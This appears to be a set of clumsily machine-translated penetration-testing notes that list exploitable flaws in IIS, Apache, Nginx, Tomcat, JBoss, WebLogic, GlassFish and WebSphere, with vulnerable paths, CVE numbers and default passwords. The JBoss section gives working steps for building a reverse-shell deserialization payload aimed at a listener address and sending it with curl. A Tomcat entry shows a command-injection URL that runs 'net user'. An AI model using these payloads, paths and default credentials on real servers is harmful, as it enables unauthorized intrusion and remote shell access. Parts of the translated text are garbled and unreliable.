Look toast before others issued a document, jot notes
-----
IIS
Parsing Vulnerability
IIS 6
* .Asp; .jpg will be resolved as asp
* Files in .asp / directory will be resolved as asp
asa cdx cer suffix will be resolved as asp
IIS 7
When the Fast-CGI, test.jpg after adding /.php url to parse the file into php
PUT write arbitrary files
WebDAV opened and allowed to write
Short IIS File Vulnerability
CVE-2017-7269
2003 r2 IIS 6 open WebDAV
Apache
Parsing Vulnerability
Unknown Extension Parsing Vulnerability
1.php.xxx
AddHandler caused Parsing Vulnerability
If there is "AddHandler application / x-httpd-php .php", as long as the .php extension to a.php.jpg
HTTPD wrap Parsing Vulnerability
CVE-2017-15715
Impact 2.4.0-2.4.29
When you upload a file named phpinfo.php line breaks, access /phpinfo.php%0a
Nginx
Nginx configuration file parsing vulnerability errors
info.jpg / 1.php
Nginx arbitrary null byte code execution vulnerability 0.5 0.6 0.7-0.7.65 0.8-0.8.37
webshell called a.jpg a.jpg null byte access .php
Nginx filename logical flaw 0.8.41-1.4.3 1.5.0-1.5.7
When uploading to a.jpg space, access a.jpg spaces null byte .php
Nginx configuration errors caused by security problems
Directory traversal
When configuring an alias, forget to add / access /files../
location /files {
autoindex on;
alias c:/WWW/home/;
}
Directory traversal autoindex is on
Tomcat
Any file written CVE-2017-12615
conf / web.xml arranged readonly = false, you can go to the file server PUT
Tomcat Remote Code Execution
CVE-2019-0232
9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 , 7.0.0 ~ 7.0.93
Free to upload
lxhsec.bat
http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user
Tomcat + weak password && background getshell Vulnerability
Tomcat manager App brute force
JBoss default port 80,809,990
JBoss 5/6 deserialization vulnerability
CVE-2017-12149
Access / invoker / readonly returned 500 indicating the presence page
The use of tools: JavaDeserH2HC, we choose a Gadget: ReverseShellCommonsCollectionsHashMap, compile and generate serialized data:
生成ReverseShellCommonsCollectionsHashMap.class
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
生成ReverseShellCommonsCollectionsHashMap.ser
java -cp:. commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip is located nc ip)
Use:
curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
JBoss JMXInvokerServlet deserialization vulnerability
/invoker/JMXInvokerServlet
JBoss EJBInvokerServlet deserialization vulnerability
/invoker/EJBInvokerServlet
JBoss <= 4.x JBossMQ JMS deserialization vulnerability CVE-2017-7504
/jbossmq-httpil/HTTPServerILServlet
Administration Console weak passwords
/admin-console/
JMX Console unauthorized access
/jmx-console/
WebLogic default port 7001
XMLDecoder deserialization vulnerability
CVE-2017-10271 & CVE-2017-3506
/wls-wsat/
wls9_async_response, wls-wsat deserialization vulnerability CVE-2019-2725
/_async/
/wls-wsat/
WLS Core Components deserialization vulnerability CVE-2018-2628
T3 triggered by agreement
WebLogic arbitrary file upload vulnerability CVE-2018-2894 10.3.6.0 12.1.3.0, 12.2.1.2, 12.2.1.3
/ws_utc/config.do
Weblogic SSRF vulnerability CVE-2014-4210 10.0.2.0, 10.3.6.0
/uddiexplorer/SearchPublicRegistries.jsp
Weblogic weak passwords background getshell
/console
GlassFish
default port: 8080 ( Web application port, ie site content), 4848 ( GlassFish Management Center)
GlassFish Directory Traversal(CVE-2017-1000028)
As% c0% af / direct access / sensitive files in the META-INF
GlassFish background Getshell
WebSphere
Java deserialization (CVE-2015-7450 )
Access to port 8880
Weak passwords background getshell
6/7 version, the background simply enter admin, you can log on without a password websphere / websphere System / Manager